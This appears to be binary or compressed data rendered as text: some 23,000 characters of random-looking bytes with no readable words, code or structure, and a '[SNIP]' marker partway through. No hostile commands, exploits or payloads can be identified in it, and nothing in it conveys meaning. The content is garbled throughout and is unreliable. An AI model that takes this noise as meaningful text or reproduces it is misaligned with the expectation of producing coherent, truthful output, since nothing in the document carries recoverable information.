.......d..L.....f..\a=.R@....]..].id=..fW$.2.(.E.....=..~[4b.^.nK..O...lY.O..ks..J$...2..N......]./.1uzG%^.g.Ri.@%.w..+..noDv..!w\u'c>.XlK.;.Qnn.r^.t...'.L......T......fP.Zo..#..B5=.,z>....vo....#2..E..........c..?_[..6.h._.sU..
...r..` .........3.!.|H...WV....N.*...C'`#.L.b......K.......H:.....T.....&..H.z..G.......M..X .]wV...N.Y    .m.7+<.7......I.H....I..;'....4........q.s1...6}`..<..M..w....B..[......xR|!.:;....l..^...<L.<g......XI.....zU...z....BG..".%.<.I..I..$....".....H.@$y .<.I..$.D../.....H.Y.!O~7..RZ...zZo......l..9h...+rY.nq.r.....J$c.......).'....vD%[&.......q.......;...    O!.O.c...e.9.a_.....O"J.SJ...fs.{.$}.qT..9#!F.....8.L<.i..#..t+B..G..1..E..AT.rb...\..G\q....n.'~....s..{........+<)|.~.~A....8.......(.^.P...$.$....Q..^.,z...z.....zk0XQ.a...
.......7..x.....u'E.:{.../.R.../.G.I*(..$..JA"........`....I....K.f..W[.N...n...MX`......j..h....3.....c.i......J.iG......|.P.m./...x".\..#.O.....#Y......R]-..R..    ..y.9.
2PZ.t5+l...Y..Y.,.L.NtP.!o.......M.c..........!..aP..8pr.A.-...S........a)&Sn...X......%.Kg...m9.\...3..(....z..J)G.......qi../.......3b[......}...7.k.:.8..aFL.#r.=@ge..t....b....l...6..F2.../}.\..).[.. ..#.t.dF.......a..:<...0%....al8`.....w....@4. Jh.G.....".    ..4.C.j..P.>.k..+o..Ek.5.v...b....v..b...X...B!.).....8.i+.v.X/..j..........|]...@g...6.K..E>."..H.'+\.dG..>..^9......p{...
....S0<E..u;...&d ....f9.#.O.f..2.d.#.#.P.d@.. .. ..F6;...T..r..bt{.E.
V..U..^5...gwVv^?...J..S|.X(.,.*.D.YND.L..|..T..|i...dav..=.L.`.u.R......C.`2...T.y..;.N*^.?.R..b..R..hr..?#...y..T..P.P...O9fP..UT....b..l%.*Qb..@x.03...2...l..{D.`...)A....`...e#A.."j.\.Koy.....+.v...S..d~..,...k..r....k'p...:]...}J....'...r.nV......8.......AK.l.L].......@.I..(./...f...(.=.....(.P........P9.:...w..M9.k......D..x';.T<....vILLxB..?..AY......-?..rvo5......xD....-......\........$..    ..E.Q..^....ha8'.C...XWqQ.k../...Z.2]j0.6g.m..m2.r..T......... 9........am..EX...#...k..z.`=I....<..fE...b.u.[..J..l..g..z.O.mA.#`s%b>.._..<./.l..gK.....S...'^.Tw^;5.....`....7.x.aw.^..$...|.9yzWM.q.U_^lFJj.........:C..>af.!;.S..........gaD..O...T..../
+!......c.h..r...    '...?.p...5GT.[.    ...F..
......L../.^.%z1pG@..^L...i/a.q..B.\.......}EhP...b1...z.v.{..'..$...Z..^...5....Y.......
.@...p.0.......pk.s........A[...Z...9..l.b....U........;...B-.p..8.X..z[.;..*.J.B.,......`0U.w..~?.x|j.d2....3.(S{...r.......t}3.......z.C}=Z/.5Y.5Y...(......Nbt-....X.#....L`.....Z.1.....:q..E....U..v.....    ..)=...q..x..m-JO./...d1.}.....J.q.; F...c%r..<.T2..kB..(.%.o.NB....u. ...~._..gA3..7.M....5i^...<o........4.?.$.2.v...!...9t    ..n.e...CF..bx.w..s\W.......:....J....p3.3.."..,    .".n+%.%..E......=.[{U ..o.E.a..].....@63.z....b..{".....0..p.~.....a.>x..f.dz.QF.Y.^........W..C..T,.}.w..OG{w.%.i..n...U3...a.sl...q.k.b3..v:A.....s.    ...t.UX../...(..}.w@    ..&......gv.2;.....YE...gs..2.....8...<....:qB.p.....O.......j.Z...o.GG.~....~.....t [...J...p.{r{..C.l.....+.A.cb..Vc.T..)e*..r=....:vk...T.kcp.J(....:.+.......
...Q.4..w..d..#.k.......c...6.E...L...27...{..{..=...d.....C...../...S^.t....k.qz..D.    ."9..y....g..N......;.9.......x1...H;..>e...\.S.LT......{...U..nP.........g..c...Z...>g0....n_.L..u=............*-F.d:.HRU...w>+...6;..f..m../.:......y....V.>p.....<.JW..^8S..2q.....w..<...w..9..\.6.Z....9...|..la...,..f.Y..W.OD..~xW...J>../>.?.d!.|.J.......ZKF.Ef@%hM.2....x.5..v'.u.|..s....]..ru..gVK-..9.k?N;r.t.*=..3...B.S..=O...T..g.t5.    N|^.....=.).`.-...-.BX!..8....R...C....4..W(f....[............X..8 S....&....*..K.}.hP..hr :..o0.A........b.wZ...Vv...n._......V....R..;|wmff.E....D{[uf.,Y..|n.h?U+.7......V..$.-.r.~b#y....n/..d.0d..YSl.@."...._v!Xv!.....e...Ki..qF\'....$8........;:..?.oe:.;.xww;.)...D.1..P..}.M...~..9W..S.n...|u.u.b........N..ny..7H...mD`....    ......%>x}...Q...W...f..m.T....V..EDg..K.
.....`.......L^..C..I.............I.Z.O...cG..v..R.+9...G.r..%~..OgGll.c.s...,.v..Bm...G...,....Y0+Do.C..V...b.Xx...b........kJw.'.F..........n...Kd.^.s0j..1.*i.F..n..j...|...E.....xo.C...L6."fE.^.......s.,PK.....Y4R."+|..U(.....r,L....:p.a.N...8.nz..-..Y...M3Z...:2.iL.........s{..n.}.....p...z.QL&...I\vrgw7.8.9...T..nw.k....:../^.%.eY..+.[.c+.`y.Q.d....{.o....UW..@...6..Q.E....~|.c*E|<.G.j..e..3.L.j.(.=/..cp....T.d .._lkO....I..'........2......
..
..........*:.........?(.........d....cK.|.*~.j.~..    [2.M+.    !.....R...On.Rv.......Q.%.#}}..n..4r.X...z.I.#...,......K.a........Ex.x.bf..;D.TYOGk..._.V|-.m...F.V<......L,.].....3.J./D.3\.F
....*..|\...j.....an.afc_...`.......'.}.....T.!.r..j..k.o4.M..e.i|...a..Y.[..lA....a...F....@M="...q(h.$d#......Ys..6..<m...67} ..I.f..D...@.....Z    .2Z..z(.Z.D.c.`9..0.Y
..Gz4nN..-...Hy.q.t.c...'..........k,.p*.I.]..H..B9]..7xS1_KY{...J..Ky/}....U
.....8#!.;.q..[..P..&.V......._o1._.s..".F(....H@....N.0..8.q...^..(*b.q.J#....%.r._...U.s..o..x/.$a.......+.....{.+.....q...f.....].......W..[.W.|.z...P..+....&.!.kq.xl;/R<g.....F..iq,    ....ZT.
.i.9.[.4..Z....vV.;........n..=+.[h.WN..O-.>.(..K.........5..B..<'..`L#......Qw...v.,J0..&^t8~y..y....!.k.o..m...?...\.0.5)i.S.4P.4....%._2j.TS.....Ht.......%%J.zF....|QO$..#..n#......]..C.lT6...Wu'.J.+.].....B..V..&,.G..6H<.....Q2..M.s...$..Z..h..y..A.j......*rZ.&...,.....1V..U6.;]'g.......?.#e.5.Lj...am.F.2.4.S..k.....[......E..T....5.G..^....K....-.,..u....._.y=>.....wu.....o....O.=o..ut........2G.B...V.b.M..A...57.......oF.^.@&?..'}..m4.O..6.G[.}..+.b..f........&k..L.....3.r....&....JO:.rZm9=.\6..).....X.:...Z..=.%5'........".]....'|m...7.*#....._.0m....)Rl...K1.C...S|....m.E7..K.&{iA...P...@.)..@.8.07a.}......T.#...><.....m.#........[j1.w....r.....>VXl&..bN<C^..%GZ.#/.
.}...q.......F.......i&.1...hAGT..X..t2.z..].d.c.+W&.....B.lU...(~8.V....?...q.......\m..!..H...Z...q o.....<..y.F........Fc.L..;.a+r..t<.T..K.k.7:..T..F..{..+K.}..zi..J....R}.!.....^.....S.Yem..H.R....K.m.3...^......    ..T....aD.Up@..u...:.4..d+.w...........<...>.hf...k_......G.....r.....s.M|........>..Usr.....J [..........H..3R...qj.....    W..<2...s...d,t20.YF.l....j..}....l...B.Z....H".H.;.'.Y.....Z...`.6...=)a.?...7
..0^;.W..sF.c...VA.u.......t...w6......9.UK.l:%~%.Q+.d0.].I....Y..{.,L...QN.........A.........n.e2.N.....J...$3.....o%76.p..tm....z+.....B"...=..'.    ...].F...c6...8+...O`..C1.d~n\.d~..Lf..i.Aw?....tz....Da.. .    M..<.$`..V.tc...f...v..YhwC{.........'.,.^......C.y.J.3...]1.."Q.4:.....-..3.....q.....#.t4.w.N<.uF"..X
z......"...G.O.._..\.<..[....(.5._...z...........o....-V..M..J....#...DO..9j)..b.&.V.....G.........E....!.F....<.O"f......*Y.......%*..0...=..(....%.i..... H./....=l.......u.K.n...1mQ7...K@.%.X..J.LA..&_u.xT.@.U...L....r,v....P..`.M%..c.........S.}qK5.Ly..w.R5UW|.T=.n...|.T8....;..p.@#.O.....s..Z2Y.N&...R..>....n..U...{N..P....$.#V?=..F....U..V....r...n......"..........\BK.s.#...-hp......y.
]\.!8..Y.?v..O....S....{!.... ....|.G....b.Y..Db....{7.j.rj....%Y.N$f.J..#<.hX|B.R.........E.....0.%..?....$.Ag..    ]|.....T..L+..dZ.7.N.....bx.........K.........r&j3)e......L.eW..m[...j;..A[........YJGHY4...P.@K>..l....#...p..lDK7...8.Z.&JG..G.(....:qFG1...[.6N8.ze.v.. ..(...{.@i..rN.r*.V......rBJ.S...fF....n.M.~.T".gHXk.'{..R.I$..I.1.pu.\.@Gy......H0..a.o......1m....E...y.p8c.Wm .n$....e..2..L.......}...1....C.T..........[.T...o.YJ....{.%.S.S.X."..|....E$...3.l....V.........`j.o.x.=c..".uO..Qu.a
...f....V_]c..........C.0.7gL.f:q4.4.g.0.sV....5.1Tp...9Z.Z-.B.....Jq.U.m.DxIrE#..B^].#.
...d?l....P..N.....;..../.1.....CY=..........p..E#{..T....!......ax..?.....4...:qf"...i.6it......M3......g.b......w...efvI.[....y{}.M.r.D-...=..o....>t...m.;Cl^...)...S...b.4..c..9......].K,......<...o....H.l.F..M....
.Ua..[P......g.B....#.f(....}.i..+....._*....^.{|....\..    ..= ......?....n..k....za.T.....S....0.i....D..A.1*k.V...UH".|fl{.......WV.o.N{?..>.....I_,...1/.C........}..Z^;2......    M..,...F|.:..}..!.e4.7MX.fUBa......'p.#.GE.d..J:..=......(..?.Nx.....? dF|Y..,.e..G.O....c....b.......;-.....3.4.Pz....|q.E.G.".@..;7...x.OI.X.E.".?.:..;....I.c,.7.L.....xRc..>..s}@.se.z.:....I:..#......(..|B.,....J.2..f.e.............N.....T[..".ArO%...B.....i.....q^.8+....fS..+.x....v.X....R,.A..HpH%.R    M.L....p`.ItGo...@$....Le.8..}....>1...i...L.H..Jh.r....`.0.Q0c.....3......b.@"..a.K...p.'..x0]'6w..ri..\.A..5]...M.Vd..m.-..lr.....&.*..o.R.`qY.....:.X.v.2a"..7.].Ns..T/1...^2HGL..~.Q.....5...wQ.dX.B.C.......H[.C#
...n..q.....Q}os...... M.=S..Q....V.".....&..v...W;...a}.m..G.    ..Q...G.=....JIX/W..o...=.".&R:N_...{z..,r.6.....H'.l...@ ......b1QH...P...;..t..b..tS..@.s.m0si.e.vWiq.7.1....0'}./-..<...OE.B.....?......5....i......Sp.%1..7.t...PD-m......l..,V.....eK.\..O.i(+.E.\..x....K....r+.H...X........o...[qo..:.O.....T.....q.b.|.#:.>`t..*+....^..QH.R..q\K..].=..=aPA.L    {k.H...b[j..b...Et|l....m.....Y.p..,rF..Hz.@...&...9....W..$..V...E......    .....6.!..8..F..K4....R+....g..:.V...z.z+\...w...R.-../.*......S.|..
..~.S.......0..un.|.v...l_g..~....j6Y....;r.l.q\:f+&.U..W..B.../.wUs..[.@,...3....^5.../b8.)...\.D.V....f.5...zy......g.j.....5..C.&......N......:..T0...6w".j{......d.    .._.N....C...V|j..{..}...S.o}...d.!.{...............a.y..X...+.qo+b.......!).a.!...X-..H..,9oy...t.#^.?9s.R.:."~..r{..S......+...../}J.Wdw...j.p...*E.G....1j]g<...jC..=...Y..~..J...{..?l(....Z..x.9!>.K.s.W......./.    O.F|.g........i...;.....z^. ...w<..e....    .....f........7.!7,.......Ih.C{5..@.mh....h_.._...W...lzh?..a4..S.Y.D....-.,a.=.1K4....i..c.xy....rb.Dg....}9.HD.Q9./y..|\.&pdy..O....VD..&...Z..rL.|1_..DI.E+./f..\.Z'..o
....y.&..y....A...{ZA..an..qV....Y.$.Y..d..Ov.B...aA....."Ff/.g....v.3+...pf..Y.gV...pf..Y.gV...pf..Y.gV.....
8.......,.z...`.D...Y.....h........:}<.......N9....6A......:.u .v.,.%..~
V^.!...0l.;JQ..0..%}...M.r ..T....-S..........).....O3vAf..._,|..&....e...".N.l8.....7....ex...A.A'..8p...O..ij"...^ .r.-8 .R.......ez*....k.....m\...T.M.ZoZE....Bj..s................hJ..+..dZ..bh
I...B.m...|..(..X2..9r.....w&.20...WV.n...}
.. ....s.;..."szbnG..H.\VG>...S....B"VpF.F.(...8..@..7.^
x.-Y-:.v(.........[.j04!M8.V7....+g.y[.......-.,..\.W...Q....kw.@..I..K...1...]...JCa....(>..SI,*.~.._!.1F...0.j....2................@A..r..+.J....-^...
J0.P\...*.%
.z.*-.=l.'..XF.'..)k..na.&.r.-.#......,.s.....xW....w....;YD..6V.....:b..c..PF..P....+fc..C.Z..&......^..NRC......A...l@.....A..}..(..O:.b.    0c..nQ..w...G..5M.6MJ.......Ns.).@....n.1..Z..C....u$.F.l....X.....z.H..S#....^[..+.......?.!T./e.%.'..E....E...K....g...D..>3..^'~]z.is.    .ey..s@....@...<..Q......!~.....p.%......6.....'/..a..............M.x...r)..AaT.............=..1hO@c.f....!..~&_d.......~6.z^..X..w..J..:....m8S.x.c..m.j<....5.'..S.VICX...T.
Q.0.I.E.~.....]X...n......V.........0. i.d...4j....;/f...    S...X.."...Dq.>q...xq....*..Y........C%.$y,..........,..../XE1.e.Z...U.f.Y5e.y..l.gL..K......U...>O..%..a..............Q9B.....8/..+...VI,...H.?.F..:...V.6.m......v...B{..G.=...........".L7......i.t.y. ....^....s...ee.s..]Y..>.jd.)g..B.&Z...5u..L...b....P!.k
%.0..%!F.S....Z.._.'r._q.n..8n.......G]A{...|..v.2...s1W.y....|...........C......    b....cH......d.@o.y....v....n...s.B..1N.e....8:8.......5h|1d.c..S+h...g    .g.y3R..yB....d...n.......U.AM.T..-..dV0..1..W..1......X...H....CNQ
...    ..6...d.....7|../0I...(~F....D.1.o.Yk....{'...0I..    .5j1>..FJ..>.g;dq'.5..5..k..?.    ........................
.*~.+..A.8+.Y9h..g;L_.kc.s....    ...Q.3.h....&.....=>o 4...3    ....X....g......m.....3.,.&.E.;ZX.kr[.\.u.a.X...NA{!..@.uh.A..y....Q.;...o...O....{?.../~..0..s..Lfe.X.4{...*U...M_.....Hu...N..'.....g$...#L....A..)C.....    hg....h.B{..c.. .).=..z.K.z.e..E...Oa....9.h..*.-..B;....^....=..S....3?;.a....Tw[.....W.V.+........F...V.<G....T    |.^.P\.3....M?o.[......C:#F..........9.!,C.....    hg....h.B{..c...,'
.0..F.c.aA..^jD+F..N..#@YB.
WC.....FR.p#..3[*...w....K..S...f.t..!.L.\o;....Y.........\..M...o......Y..P.&........ ...:.zT...3..4s,N.....FJw..F.k8..1,$./.....M
.).p.......T.k|.......=....].....s..g$..uK.l6&.u.....+.Ww.....3H;b5Y..$..=.Mx&........d>.\].....]....#._....pe8=.b.L...L........G..b.._\..X..DifF7xq^..a.    .0).n..qN.
..w.
.7J.R..Fu.....t....2.... .v..j...._>....... .:...A.#*._.....1Q.D..... ).z..$<.m.D._`.e.T:.....75......#.8..8K.....hDSA........1Q<C.z.en.j....0    ...#.x....J..*..+..G#....g........O.......8.S.....2...y..............K7......(.cz.....V...q..|...{.t6..M......B...:.$..R...:O..<4...m..>h......ho..>h.@...o@.....0.....s.$..?|..YL..\..T..8..@.#...F    .M.........1..R.l.
...ny...3)|...i.n.l$~.As/...t_M.........$=....8..sY....f.e...v.g..    T ;.....kS.kB....UO.!...E....o...Z#4yz}...R....f8...k*h....q7F......H....t..v......U?.T..@].....OH....    _...i..%*.............vE.X"^A....;..A1.=... ..h.j..........s....E.....xVV.......|/...Ni.....0.........7...d1?.%..3N...f....~..+`..7.L..w..6......r...R.-.x..b...l...]G
.m..b..H1^..)..........0W\".vZK.....=...j@X,yY.."yXU..._-.f...|H.t.KP+.)0..z..$M..}..L.-....V.......3.)......H...(>.    &oP.b.;k.)...2..........7}fg..O..F%.W.^..).!....R/...m..:S......$;+.B-W..".p&...X.K... ...Q.7.=...F.Cx.
.7..t80?.m.G....jC.......`._GM..X...P.....:...!.?H4....;. .,-
....4!dN4..?..K..9[.....hC.p^@.~0>..9.v...2......)Y@Eq..s.......+.o..xl...p..a.\.`=.......t
.p...xl.cw.....2..[...o.8.A........9.}.`..7.........'U.[.D.]U.,.....!...-    .Q.......fY<.c.F.H.nV.J....y...A.'~.<.y......M..l3.5c..4..2....o.U5......`.    .\.|....]....{.....,...N..(n#..w....F....=..
.oo...i.c...........+&.7q7uuh.1")6..G....WZ....v;*T?.?k..uYnC...! ./].2....m<..(..N..9..M;.S.....r..    .....%Z&........3...b...'....*fU.L\H..N.5.Oe8....,..)ar.X.....x..C3.../.T....3..v..T....p..<....F.L5.IF}JsNMoi).../,.yYLm...%....??WW.....h.t(o.:]....P..m..$...t...U.?......G..W.....Bkw7q......._^Nd@.]\.N,I?!1$..=9a8W..\...2.....x:T.#H.e^...O...x.DL..<..(R....$}lTN.h......    ......S..d.
.-C.jNk....b/......a>Wk^CBCI...#.GN]rj.;p`.e*.v....eEr..&.?...Q.!..!m.8.i.$..IJl$x.R`'...$z#..!=Z.Lz.%9......
).V...(!......%....J{/...oW....K..k.....L.~...    8m^.}yvv.........S..b"..o..I...%V6~.^...Wta.o..%.    t.>.d.j
...wo.0...5/P...2.....~6...
.....3.F.R.hd.JN....]*.K...T-....W..U...
...f..X..P.R..@*..|.dq.......N@
%R.O.....PBxl.#.....1@]..T,....H@.G..H`..F..t.....N.mb'..^p.CB.........!h..Yx.J(X. .........".C..A.]c......;..!?s.2.-.E..<`xy.......mn......4...8!.p.cy.B.x.r...s...3k..X;p.N*..Q~...q[.$=[.y8.tB._*H..a.o.......^......$.:O\5..........".Y..@......;v.;p)]...0m.\)`...^...    .*..j..1.{+_-[...
.l..|...5._....L..o......g.B..16.D8.......j|.....G]+...T*q`...2.'.J<......U...^.q.......%t:.......H7.^.)..-\.&~    .........N@;..nh.@{........qg...E..S..6yq...z....N...y.XJIOeT5...".G..........|..8.....j .3e....?aPA..#..-.......:.e....f.!$.j2...v8.\....    ~.z....q..d.....9.-..OZF.....6<q.W.0..0(..g/....Obv.N.".2oE~.U...Lsn........%.......I.    ...2...H..!...09....T5.....j.....j...}/.rYk....dD...q9.......9.l....T5..8....I...GR.T:.hT..\;.[.m.    ]'EU....$|.z^.|..x.<.6;pN-}ezt......a....h..i..i.Y8......>:<..gax.....k.83vn....K.*q5Yh...t..I...`(.$K..;.w.....#r..8..$...ZB...s..d..Wk. &..f..i....}..../....`...    .&.I...\.m....>..:THi..,'    ..t`b...
Y..Q.....#>.....w...Q.n.H...Mz.1{,..xB1W=Hs`.$...|.V.j.z[.q.....U.+/.W....r.riQB.8Z.....(.A.n.l..mp8..h<0...@..."....m.c[.....\x.-).........T...._l...|*.(....7..RO..4.8..;3.a.FY."J..<.c....6.J...3.@~)\..~../)........~....._;.Fe..........U...g/"....}..........o.S.....4i......act..........Q.5Z.......3U.:.e._.W.>..N    .I....2.....]..,j......5.D.r'Vi..L..d...^...@;    .vh....h.......kh..Is..C....=...@A8b...}.Y./T..k...VC.L*.u;.>_8..F..x.R-........~.(.C..4..+6V{.%.........,=.....{2..."`z2.....G.DcJ\NI/TeY...>.J.#....g.Gck...*    .....E......3..2r.......>.........PkeH.|i...7.Ke.&..J.....F...R.'..b...R..b>..Q..    `.Y.......k.....=......g...Z..i.U*..u.7%d.......{.;.....f........2U.~.|..A...Y.H.DY....+.|).#K..[`i..N_?@..0.p'....}..w...g....C.B......!;\..f....D.c;.3Va...1.........J.rn..`.].4W.(r..KZ.[...:.j.5.'..wF.t]...z....6....'...9.R...v.......D..l...#h....MM..6.....h....L..Ii..C.....4.......    .e.P.CP.3..(..5x.t_.M ..`.gn...#}.....H.9..6..us.....Q..B]|....-!U.].y....`8....T....d0K...?.KE.9$...p.....p..r...d.+7C.,....n1.H{L;.t.*T......:/L..........;.J..e@..._M.[..w.L..{^i\Xx...8.oE,.jXCE.(.5t-..Fb.Hi+.Hlx..7..5.z.......F.P.....J...t.a......B....0r.....Dxq..,.....J..S....v....ys..y.[.......    w_..P.N.b.)Bg4..A...L.R......y.....pj...4.8E..mV...3..,c
2.y5aC0.x.x.r.6p.r..R1...a_....T..V.o......b......<...I..0'..Y....f,..'.......{Y.....E......P..i.....=lZ~...?7.L?..y......=...pk.h....../.....W.7S.xc.e.5..........w    .f.......m.%.b    fT.wJ.......B........0...=....K.....w...Gp.^..~Yp..............4.vc......A...M....N.......f..{..8...xO........i..4.{..=...xO...9.......ER....{Y...2..R..pG.........8,..G.Y`..h.....Q....y........1....?. .i..8....v..W.{S. .c@o    .a.    b G.w......k.9b.M....(.h}?......0.[.1.K.....w........b.<.'...k.i....n.jh.jh.jh.jh.jh.jh.jh.jh.jh.jh.jh......b.....$..'........K=P{{@.=.#z.ihw@...[....#....h.3..q..........4....Gz..`....1...._..X.u.^..6.....Nn....w.No..6<..2#}.....{...de...@.U..j_.)..we..N..6.*.U..w..yx.2.wQt.=.[.e.2E( ..q.M).7........W.v..~X..v..'.O].M..`..~1O../.s....... .]....\..6'..V.ND..
..
.9..B-......tP...c...|d..8...&.9bS...|.Z...h'...........}....}.\.M1&..y.....HS...t=...<y.....
.N...D..nj.......f<.O.7W.w.y........|....2.....ng:..?..8Z...60k..+7.n/.8c%%....K.W.[W-....?*;.M.M..............2O}...T....../...F..q)T5..FKa.,1..0c~$T.\......TT..<9........p.7.SC.S.Cs..    ...N\....d*......Es3@}.\(.p.]".....z....s    .......f....-....[)5.{S..... waT.6.....X..0{.....CM..8.Lb\...y.x.?.|.QmC.rQmc.3..6....m.P..Qq....1......g..a.za!.L+........2/W.E..........(.o.N"...'z.x.a3.G.....e.....a^...h..k.yQ...+.N..<>.vy.....G.c..    .W...'v~..X...3b....6...).....D..-4...P-].8|Z9.(    ....9..`90... ..0......h.O.....Pw=....YA..H..D...IdzU;.......=>rO...........A.S.d....>...0
.qK..d4-l.L....?.?........3..^~......;..Lf..M..=g.p..@.ep...........Wyh!...h.zM.}g....E.6pE.7m.-%..d.F...o..3y.....'..?x5._}[wO'&w.L_'v..X./.....r....N.CjT<Y.E.......G.r$....,..2.6....}4r.A.....h;p.....Ic`w.x.q.4.g.    .C[..d.X.|d<(....g=z.9=...R...!l.. ....DY.y@Fx#.M...U\..DI.Wv.}...xc..o..vZ...q.'~t.....0.d..    .?-}..9...b..?......j.~..IU;..G..OT"..vN..-iv...u.{.}...{Q.Z...Oc".f.Eby.A..<TF.|...0Vg.jM.......M]{.G.....j3..V..x.'.H..e.t.....q.E=wj3.:.....0...<..zI,p.;|M..M.{...}....1.k0.]..%....2...L.yLa.......N:..6........Or.i.=f.g4/R..\..Q..\1.i.B.2@o..o
.C#r.e....T...$0.'.9.k.a..0oP.......8..7.9...0...<...
.W.s...9...MP.i...e`a#..)2..!7.......    ..w.....|.....5..U-.......r....$V.m............Yc......1...H..H.....&..(..R.W.k.........h..2.Yh....v....... ...=..    hL...6..ys.R...J_....b$.,..D...w'...d9...5.A..VX<.I....k.1_..p...}m..p.^w.....+.p....#....#.;....0|...a.g.w...    .;...P.]."...LN...h.....D..@5J.8;O.'G.2?I.aq.[.$[........&....    t.h......iu.......@RJ..........O..K....."......pi.\1.v,.......,...]..]........N%.S,....2.././;............].G"2Rsf.....+.!.V.]....C..]>..p+!....0.C.O.%.\.4......(.M....O.......N.U>J.....w#u......)k.p.{......,%I......P[Ay:Z.+...b....sy..c......}...L*...x..~..K...G^.U
..~F.-...........Q..<G....3~    .....X.......&.h.@....D.{.....O.m.s0.J..%..z.6.......G....e..T>........$..Q......rf..z.G!..r.,....`@.i.pK....|......f.&.`]z.`.h
...V.........c....>1......#...j)}...?B3@........If.;O..$.N!C.....X....aB...0.h..X.....L..I.$s....J...S../..kJ."GT.;x.-.2......V
.4.    N..(.
..}j.......0!..GR.....{,...%.r...T...n..=. .......Tw^.{...=K.....PR..S..SK.....q....H m....u.b...,.0.<...\.A...r...uo.[.pk.L84 _.j.~.C!.X..E.+..R.Q..q...bI.m....Nkh..Y.NK
.N..Z.p........\........S../....D.YJ....l..|.F..&f....g...Gb...J.v..fC..b....f..M./.:C........n~.:..'E-V...pP....$....]g..:I#.. Z....YX42>k.$0.~.a5n~:+....(.@.."....K.........LI..;.xHvG.g.v..-1..fR.o.8..l#E%o*.U.[..Nn-.......[..d.+............6R....s..K.......K.g.4..d>...>7T.O.c.....F.vH..K.my..........._.S..........^!......F..9.f8..#...........-[...5...~..)......n.Rw..w.....v..{......=..Y...{.g)o.Z..Aj..j.9O;V...L..+.._.../..i..@q.S..k...3..h..AM......s....}.}.p......}.}.p......}.}.p....._AD..............uN._..G.w.....F..+$......&..q.F..(......p@.?g...n.. l.44$Cc....f.[;4..yb.}`.K..[...@.i..R..Qn......x............x.9....,.....t...(.....B.............=..1hO@c.....X......G.<7.8OX..y".z....;1.......#...M.o.    _6....W    '..S...J8.*X.\U...^..d..;.t0`.%..Z..G.G....@g..i......N#~[\.\@.-.P.........^......^...a`..&)[8    l!B..d..yL....KOQ..u.. xy.y.F....R..#$.
|.....z..p.q.M.....[W....[w..?.W...i.oV.B....K....S]?>L0...+.....r2...;...j..R^N...m.Z.(..n..CD..P<,..y%[......X(..U.o.....Y/.O....g..v....&..x..q./o...l.......\=h\.^..C..:../V|..."....+..S.n....!V\...2:..w.X..........+XR..T..L+..dZ.7.N...lw&.Q..}r..z
...[SNIP]...
[.}.....
V.B.D.Y-.....+..q.QKTi4f.DB.(...k`}..../.&*.b .>._.i.......J..7....x...`..x.........z...P6....o.e..........._Q.......IB...4.c
F.I..Pd.K|..&-..M.....Hf.....A....3. .2.Di.B.h.h..4....@G.....:    .<?c}..^!b.KO'.....P..R.    v.g6.....j..../.........q.{v..........l.tkr`E.6~.....{....{7.....$vV...B.$:.,. .N........t.&..Xo"b..."6.?..9......2.d..kI...w...a..a.....]...dwM4....e...\.q..^...D.....E.W.....Z....(..Xpmt...........7....\!7..L..'......p......X*n...d...$..2CK....lAU.H:.,uG...eT5..Hkhcd.#.:V.f.#...~*..G.........(v....LoR54CKF3.,9......%...MI...d.. r.......0...`.G9[Ep....Ec.........%.i.6l.M.Nl.I..z.4#..(.!..4..    OZ..G..q..y.7.@3=....mDP......w.$. a..C...4...A....5.N.....f.S+J=.B!~e.r0..h<.....9{.w{C0.._...he......j..*,....G%.....Wq...    ..-..Jg.J%.......j...y..Y.r.[..]..g..g..A...Y. eU...$..4o..-.y..\A..A...aw.(.....h[G... `.H\..&.F4.y.{..b...M q.:JN..!.3.M..dU0..9K...O.W..s.=.\....S..bL.$3....n..x".*.
.{;]1.l.T.u...z..U.\5eTCj=..............*..)J..8.s....w    ....;    .q^If.v3..fx....J.lk......$|"^.J.^^...40N......\ ....H....f.w7..|.k............Pl.)......]<..{!J.o..p...Dy....7o...[p.....s..x.6..........,c...-\....b.t.....%.#.WT.K...".....E..7..YL..    .......i..(..~.<[..N.L.1.....6...A.........    ?%|....C....]...I`.K..(.w...Y.....7.2......    .`. `..w.M.....3...}..wC.}..$....4V.... 6L.e.c.....4Y.a....M..].t.C.....m[...lZ.E|.D(.J......u].e..2..5R.Eq..U./_.h.B...S....y=...<....r:dW...9s..2....O..\    2....A.....a.o..Q...f.-..c$...9`....Z..E...K.Y........".    Z;.j#ST.m.m..h...I.u..Ll.q)r.r1{.H:.g....N.C.^....T..o.}...Z..V....!_.'.S..p @.._.&...9...#......3.....S.E.9u..p2p".|..P    .#.CT......^.!."TI?..~..~z.D..l.    3..5zdwi.H..=...ya.j...o.:0....Kv.%...c....GL/Z.?.............E..R.]z...T....m........J..U.p<.4....O..q...;...........ro.z.....E.U...b.7>V....z..r..x...q$
~r.gfc...z....3.h<..=.Oz"........`DsK?8_..P4..W..../.}.30.a...O.eG.. +..D....B...n..Ndtq=Z?P...5]QuM>....o..z.k.c.....
W~j.C.....K..?......K.....&..    .Vj.    n.....Z...~..........RUzG.o...wo....]....?.~%..(\....V
....c`.)i..aw    .2.g..:....C.d...o.....p...k.....+....3.<~.$y]...>......?...5.?......gN..j..A.z..24......*1@.KAZ.>..MB?.R..g..{..Z..|.5.....,.....4....".......0.h.....X..&....*.0.....\    .. M.G.z4.20./..3...rz..D{.j...^hYV...f#.l&.He
..D..4y.....W3..H1.&.&....)....)%Q...L.......C.T .2.......\W?..x.x...hZ..|..Y8.R.x.)R`af._..
.r..@{...9..N.@..I......U.s....Q.o0...5U3.rY......2.......\.......8g.(..qN.......5.5q.........M.:.....1.I=.m....<...Pe..w..mW]..1jk.5......l.......<.A.........o..Y'\.2Td...K5b:
.........y.^(^Pg......W...Wo.....Z..m..c..........he..^.x......p~.E..r\O...W:.............gL.. ..Ct...hy1...V.].z..C.-L.E..0..)..B.n.....|.....B.pY.......>.....eIV......+....'....Wp..|. ..]e.Rr......l.4.R....' ..|..B
